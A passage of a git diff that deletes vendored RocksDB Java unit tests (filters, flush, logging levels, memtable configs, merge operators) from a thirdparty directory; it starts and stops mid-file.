-      assertThat(envOptions.setFdCloexec()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void bytesPerSync() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final long longValue = rand.nextLong();
-      envOptions.setBytesPerSync(longValue);
-      assertThat(envOptions.bytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void fallocateWithKeepSize() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setFallocateWithKeepSize(boolValue);
-      assertThat(envOptions.fallocateWithKeepSize()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void compactionReadaheadSize() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final int intValue = rand.nextInt();
-      envOptions.setCompactionReadaheadSize(intValue);
-      assertThat(envOptions.compactionReadaheadSize()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void randomAccessMaxBufferSize() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final int intValue = rand.nextInt();
-      envOptions.setRandomAccessMaxBufferSize(intValue);
-      assertThat(envOptions.randomAccessMaxBufferSize()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void writableFileMaxBufferSize() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final int intValue = rand.nextInt();
-      envOptions.setWritableFileMaxBufferSize(intValue);
-      assertThat(envOptions.writableFileMaxBufferSize()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void rateLimiter() {
-    try (final EnvOptions envOptions = new EnvOptions();
-      final RateLimiter rateLimiter1 = new RateLimiter(1000, 100 * 1000, 1)) {
-      envOptions.setRateLimiter(rateLimiter1);
-      assertThat(envOptions.rateLimiter()).isEqualTo(rateLimiter1);
-
-      try(final RateLimiter rateLimiter2 = new RateLimiter(1000)) {
-        envOptions.setRateLimiter(rateLimiter2);
-        assertThat(envOptions.rateLimiter()).isEqualTo(rateLimiter2);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FilterTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FilterTest.java
deleted file mode 100644
index c610963..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FilterTest.java
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-public class FilterTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void filter() {
-    // new Bloom filter
-    final BlockBasedTableConfig blockConfig = new BlockBasedTableConfig();
-    try(final Options options = new Options()) {
-
-      try(final Filter bloomFilter = new BloomFilter()) {
-        blockConfig.setFilter(bloomFilter);
-        options.setTableFormatConfig(blockConfig);
-      }
-
-      try(final Filter bloomFilter = new BloomFilter(10)) {
-        blockConfig.setFilter(bloomFilter);
-        options.setTableFormatConfig(blockConfig);
-      }
-
-      try(final Filter bloomFilter = new BloomFilter(10, false)) {
-        blockConfig.setFilter(bloomFilter);
-        options.setTableFormatConfig(blockConfig);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FlushTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FlushTest.java
deleted file mode 100644
index 46a5cdc..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FlushTest.java
+++ /dev/null
@@ -1,49 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class FlushTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void flush() throws RocksDBException {
-    try(final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setMaxWriteBufferNumber(10)
-        .setMinWriteBufferNumberToMerge(10);
-        final WriteOptions wOpt = new WriteOptions()
-            .setDisableWAL(true);
-        final FlushOptions flushOptions = new FlushOptions()
-            .setWaitForFlush(true)) {
-      assertThat(flushOptions.waitForFlush()).isTrue();
-
-      try(final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        db.put(wOpt, "key1".getBytes(), "value1".getBytes());
-        db.put(wOpt, "key2".getBytes(), "value2".getBytes());
-        db.put(wOpt, "key3".getBytes(), "value3".getBytes());
-        db.put(wOpt, "key4".getBytes(), "value4".getBytes());
-        assertThat(db.getProperty("rocksdb.num-entries-active-mem-table"))
-            .isEqualTo("4");
-        db.flush(flushOptions);
-        assertThat(db.getProperty("rocksdb.num-entries-active-mem-table"))
-            .isEqualTo("0");
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/InfoLogLevelTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/InfoLogLevelTest.java
deleted file mode 100644
index 48ecfa1..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/InfoLogLevelTest.java
+++ /dev/null
@@ -1,107 +0,0 @@
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-import org.rocksdb.util.Environment;
-
-import java.io.IOException;
-
-import static java.nio.file.Files.readAllBytes;
-import static java.nio.file.Paths.get;
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class InfoLogLevelTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void testInfoLogLevel() throws RocksDBException,
-      IOException {
-    try (final RocksDB db =
-             RocksDB.open(dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key".getBytes(), "value".getBytes());
-      assertThat(getLogContentsWithoutHeader()).isNotEmpty();
-    }
-  }
-
-  @Test
-  public void testFatalLogLevel() throws RocksDBException,
-      IOException {
-    try (final Options options = new Options().
-        setCreateIfMissing(true).
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(options.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      db.put("key".getBytes(), "value".getBytes());
-      // As InfoLogLevel is set to FATAL_LEVEL, here we expect the log
-      // content to be empty.
-      assertThat(getLogContentsWithoutHeader()).isEmpty();
-    }
-  }
-
-  @Test
-  public void testFatalLogLevelWithDBOptions()
-      throws RocksDBException, IOException {
-    try (final DBOptions dbOptions = new DBOptions().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL);
-         final Options options = new Options(dbOptions,
-             new ColumnFamilyOptions()).
-             setCreateIfMissing(true);
-         final RocksDB db =
-             RocksDB.open(options, dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(dbOptions.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      assertThat(options.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      db.put("key".getBytes(), "value".getBytes());
-      assertThat(getLogContentsWithoutHeader()).isEmpty();
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failIfIllegalByteValueProvided() {
-    InfoLogLevel.getInfoLogLevel((byte) -1);
-  }
-
-  @Test
-  public void valueOf() {
-    assertThat(InfoLogLevel.valueOf("DEBUG_LEVEL")).
-        isEqualTo(InfoLogLevel.DEBUG_LEVEL);
-  }
-
-  /**
-   * Read LOG file contents into String.
-   *
-   * @return LOG file contents as String.
-   * @throws IOException if file is not found.
-   */
-  private String getLogContentsWithoutHeader() throws IOException {
-    final String separator = Environment.isWindows() ?
-        "\n" : System.getProperty("line.separator");
-    final String[] lines = new String(readAllBytes(get(
-        dbFolder.getRoot().getAbsolutePath() + "/LOG"))).split(separator);
-
-    int first_non_header = lines.length;
-    // Identify the last line of the header
-    for (int i = lines.length - 1; i >= 0; --i) {
-      if (lines[i].indexOf("Options.") >= 0 && lines[i].indexOf(':') >= 0) {
-        first_non_header = i + 1;
-        break;
-      }
-    }
-    StringBuilder builder = new StringBuilder();
-    for (int i = first_non_header; i < lines.length; ++i) {
-      builder.append(lines[i]).append(separator);
-    }
-    return builder.toString();
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java
deleted file mode 100644
index 83e0dd1..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java
+++ /dev/null
@@ -1,87 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.util.Random;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class IngestExternalFileOptionsTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource
-      = new RocksMemoryResource();
-
-  public static final Random rand =
-      PlatformRandomHelper.getPlatformSpecificRandomFactory();
-
-  @Test
-  public void createExternalSstFileInfoWithoutParameters() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      assertThat(options).isNotNull();
-    }
-  }
-
-  @Test
-  public void createExternalSstFileInfoWithParameters() {
-    final boolean moveFiles = rand.nextBoolean();
-    final boolean snapshotConsistency = rand.nextBoolean();
-    final boolean allowGlobalSeqNo = rand.nextBoolean();
-    final boolean allowBlockingFlush = rand.nextBoolean();
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions(moveFiles, snapshotConsistency,
-        allowGlobalSeqNo, allowBlockingFlush)) {
-      assertThat(options).isNotNull();
-      assertThat(options.moveFiles()).isEqualTo(moveFiles);
-      assertThat(options.snapshotConsistency()).isEqualTo(snapshotConsistency);
-      assertThat(options.allowGlobalSeqNo()).isEqualTo(allowGlobalSeqNo);
-      assertThat(options.allowBlockingFlush()).isEqualTo(allowBlockingFlush);
-    }
-  }
-
-  @Test
-  public void moveFiles() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      final boolean moveFiles = rand.nextBoolean();
-      options.setMoveFiles(moveFiles);
-      assertThat(options.moveFiles()).isEqualTo(moveFiles);
-    }
-  }
-
-  @Test
-  public void snapshotConsistency() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      final boolean snapshotConsistency = rand.nextBoolean();
-      options.setSnapshotConsistency(snapshotConsistency);
-      assertThat(options.snapshotConsistency()).isEqualTo(snapshotConsistency);
-    }
-  }
-
-  @Test
-  public void allowGlobalSeqNo() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      final boolean allowGlobalSeqNo = rand.nextBoolean();
-      options.setAllowGlobalSeqNo(allowGlobalSeqNo);
-      assertThat(options.allowGlobalSeqNo()).isEqualTo(allowGlobalSeqNo);
-    }
-  }
-
-  @Test
-  public void allowBlockingFlush() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      final boolean allowBlockingFlush = rand.nextBoolean();
-      options.setAllowBlockingFlush(allowBlockingFlush);
-      assertThat(options.allowBlockingFlush()).isEqualTo(allowBlockingFlush);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/KeyMayExistTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/KeyMayExistTest.java
deleted file mode 100644
index 8092270..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/KeyMayExistTest.java
+++ /dev/null
@@ -1,87 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class KeyMayExistTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void keyMayExist() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes())
-    );
-
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        assertThat(columnFamilyHandleList.size()).
-            isEqualTo(2);
-        db.put("key".getBytes(), "value".getBytes());
-        // Test without column family
-        StringBuilder retValue = new StringBuilder();
-        boolean exists = db.keyMayExist("key".getBytes(), retValue);
-        assertThat(exists).isTrue();
-        assertThat(retValue.toString()).isEqualTo("value");
-
-        // Test without column family but with readOptions
-        try (final ReadOptions readOptions = new ReadOptions()) {
-          retValue = new StringBuilder();
-          exists = db.keyMayExist(readOptions, "key".getBytes(), retValue);
-          assertThat(exists).isTrue();
-          assertThat(retValue.toString()).isEqualTo("value");
-        }
-
-        // Test with column family
-        retValue = new StringBuilder();
-        exists = db.keyMayExist(columnFamilyHandleList.get(0), "key".getBytes(),
-            retValue);
-        assertThat(exists).isTrue();
-        assertThat(retValue.toString()).isEqualTo("value");
-
-        // Test with column family and readOptions
-        try (final ReadOptions readOptions = new ReadOptions()) {
-          retValue = new StringBuilder();
-          exists = db.keyMayExist(readOptions,
-              columnFamilyHandleList.get(0), "key".getBytes(),
-              retValue);
-          assertThat(exists).isTrue();
-          assertThat(retValue.toString()).isEqualTo("value");
-        }
-
-        // KeyMayExist in CF1 must return false
-        assertThat(db.keyMayExist(columnFamilyHandleList.get(1),
-            "key".getBytes(), retValue)).isFalse();
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LRUCacheTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LRUCacheTest.java
deleted file mode 100644
index d2cd15b..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LRUCacheTest.java
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-public class LRUCacheTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void newLRUCache() {
-    final long capacity = 1000;
-    final int numShardBits = 16;
-    final boolean strictCapacityLimit = true;
-    final double highPriPoolRatio = 5;
-    try(final Cache lruCache = new LRUCache(capacity,
-        numShardBits, strictCapacityLimit, highPriPoolRatio)) {
-      //no op
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LoggerTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LoggerTest.java
deleted file mode 100644
index f83cff3..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LoggerTest.java
+++ /dev/null
@@ -1,238 +0,0 @@
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-import java.util.concurrent.atomic.AtomicInteger;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class LoggerTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void customLogger() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.DEBUG_LEVEL).
-        setCreateIfMissing(true);
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        // there should be more than zero received log messages in
-        // debug level.
-        assertThat(logMessageCounter.get()).isGreaterThan(0);
-      }
-    }
-  }
-
-  @Test
-  public void warnLogger() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.WARN_LEVEL).
-        setCreateIfMissing(true);
-
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        // there should be zero messages
-        // using warn level as log level.
-        assertThat(logMessageCounter.get()).isEqualTo(0);
-      }
-    }
-  }
-
-
-  @Test
-  public void fatalLogger() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        // there should be zero messages
-        // using fatal level as log level.
-        assertThat(logMessageCounter.get()).isEqualTo(0);
-      }
-    }
-  }
-
-  @Test
-  public void dbOptionsLogger() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final DBOptions options = new DBOptions().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      final List<ColumnFamilyDescriptor> cfDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY));
-      final List<ColumnFamilyHandle> cfHandles = new ArrayList<>();
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath(),
-          cfDescriptors, cfHandles)) {
-        try {
-          // there should be zero messages
-          // using fatal level as log level.
-          assertThat(logMessageCounter.get()).isEqualTo(0);
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle : cfHandles) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void setWarnLogLevel() {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      assertThat(logger.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      logger.setInfoLogLevel(InfoLogLevel.WARN_LEVEL);
-      assertThat(logger.infoLogLevel()).
-          isEqualTo(InfoLogLevel.WARN_LEVEL);
-    }
-  }
-
-  @Test
-  public void setInfoLogLevel() {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      assertThat(logger.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      logger.setInfoLogLevel(InfoLogLevel.DEBUG_LEVEL);
-      assertThat(logger.infoLogLevel()).
-          isEqualTo(InfoLogLevel.DEBUG_LEVEL);
-    }
-  }
-
-  @Test
-  public void changeLogLevelAtRuntime() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-
-         // Create new logger with max log level passed by options
-         final Logger logger = new Logger(options) {
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-
-        // there should be zero messages
-        // using fatal level as log level.
-        assertThat(logMessageCounter.get()).isEqualTo(0);
-
-        // change log level to debug level
-        logger.setInfoLogLevel(InfoLogLevel.DEBUG_LEVEL);
-
-        db.put("key".getBytes(), "value".getBytes());
-        db.flush(new FlushOptions().setWaitForFlush(true));
-
-        // messages shall be received due to previous actions.
-        assertThat(logMessageCounter.get()).isNotEqualTo(0);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MemTableTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MemTableTest.java
deleted file mode 100644
index 59503d4..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MemTableTest.java
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class MemTableTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void hashSkipListMemTable() throws RocksDBException {
-    try(final Options options = new Options()) {
-      // Test HashSkipListMemTableConfig
-      HashSkipListMemTableConfig memTableConfig =
-          new HashSkipListMemTableConfig();
-      assertThat(memTableConfig.bucketCount()).
-          isEqualTo(1000000);
-      memTableConfig.setBucketCount(2000000);
-      assertThat(memTableConfig.bucketCount()).
-          isEqualTo(2000000);
-      assertThat(memTableConfig.height()).
-          isEqualTo(4);
-      memTableConfig.setHeight(5);
-      assertThat(memTableConfig.height()).
-          isEqualTo(5);
-      assertThat(memTableConfig.branchingFactor()).
-          isEqualTo(4);
-      memTableConfig.setBranchingFactor(6);
-      assertThat(memTableConfig.branchingFactor()).
-          isEqualTo(6);
-      options.setMemTableConfig(memTableConfig);
-    }
-  }
-
-  @Test
-  public void skipListMemTable() throws RocksDBException {
-    try(final Options options = new Options()) {
-      SkipListMemTableConfig skipMemTableConfig =
-          new SkipListMemTableConfig();
-      assertThat(skipMemTableConfig.lookahead()).
-          isEqualTo(0);
-      skipMemTableConfig.setLookahead(20);
-      assertThat(skipMemTableConfig.lookahead()).
-          isEqualTo(20);
-      options.setMemTableConfig(skipMemTableConfig);
-    }
-  }
-
-  @Test
-  public void hashLinkedListMemTable() throws RocksDBException {
-    try(final Options options = new Options()) {
-      HashLinkedListMemTableConfig hashLinkedListMemTableConfig =
-          new HashLinkedListMemTableConfig();
-      assertThat(hashLinkedListMemTableConfig.bucketCount()).
-          isEqualTo(50000);
-      hashLinkedListMemTableConfig.setBucketCount(100000);
-      assertThat(hashLinkedListMemTableConfig.bucketCount()).
-          isEqualTo(100000);
-      assertThat(hashLinkedListMemTableConfig.hugePageTlbSize()).
-          isEqualTo(0);
-      hashLinkedListMemTableConfig.setHugePageTlbSize(1);
-      assertThat(hashLinkedListMemTableConfig.hugePageTlbSize()).
-          isEqualTo(1);
-      assertThat(hashLinkedListMemTableConfig.
-          bucketEntriesLoggingThreshold()).
-          isEqualTo(4096);
-      hashLinkedListMemTableConfig.
-          setBucketEntriesLoggingThreshold(200);
-      assertThat(hashLinkedListMemTableConfig.
-          bucketEntriesLoggingThreshold()).
-          isEqualTo(200);
-      assertThat(hashLinkedListMemTableConfig.
-          ifLogBucketDistWhenFlush()).isTrue();
-      hashLinkedListMemTableConfig.
-          setIfLogBucketDistWhenFlush(false);
-      assertThat(hashLinkedListMemTableConfig.
-          ifLogBucketDistWhenFlush()).isFalse();
-      assertThat(hashLinkedListMemTableConfig.
-          thresholdUseSkiplist()).
-          isEqualTo(256);
-      hashLinkedListMemTableConfig.setThresholdUseSkiplist(29);
-      assertThat(hashLinkedListMemTableConfig.
-          thresholdUseSkiplist()).
-          isEqualTo(29);
-      options.setMemTableConfig(hashLinkedListMemTableConfig);
-    }
-  }
-
-  @Test
-  public void vectorMemTable() throws RocksDBException {
-    try(final Options options = new Options()) {
-      VectorMemTableConfig vectorMemTableConfig =
-          new VectorMemTableConfig();
-      assertThat(vectorMemTableConfig.reservedSize()).
-          isEqualTo(0);
-      vectorMemTableConfig.setReservedSize(123);
-      assertThat(vectorMemTableConfig.reservedSize()).
-          isEqualTo(123);
-      options.setMemTableConfig(vectorMemTableConfig);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MergeTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MergeTest.java
deleted file mode 100644
index 73b9086..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MergeTest.java
+++ /dev/null
@@ -1,240 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Arrays;
-import java.util.List;
-import java.util.ArrayList;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class MergeTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void stringOption()
-      throws InterruptedException, RocksDBException {
-    try (final Options opt = new Options()
-        .setCreateIfMissing(true)
-        .setMergeOperatorName("stringappend");
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // writing aa under key
-      db.put("key".getBytes(), "aa".getBytes());
-      // merge bb under key
-      db.merge("key".getBytes(), "bb".getBytes());
-
-      final byte[] value = db.get("key".getBytes());
-      final String strValue = new String(value);
-      assertThat(strValue).isEqualTo("aa,bb");
-    }
-  }
-
-  @Test
-  public void cFStringOption()
-      throws InterruptedException, RocksDBException {
-
-    try (final ColumnFamilyOptions cfOpt1 = new ColumnFamilyOptions()
-        .setMergeOperatorName("stringappend");
-         final ColumnFamilyOptions cfOpt2 = new ColumnFamilyOptions()
-             .setMergeOperatorName("stringappend")
-    ) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpt1),
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpt2)
-      );
-
-      final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-      try (final DBOptions opt = new DBOptions()
-          .setCreateIfMissing(true)
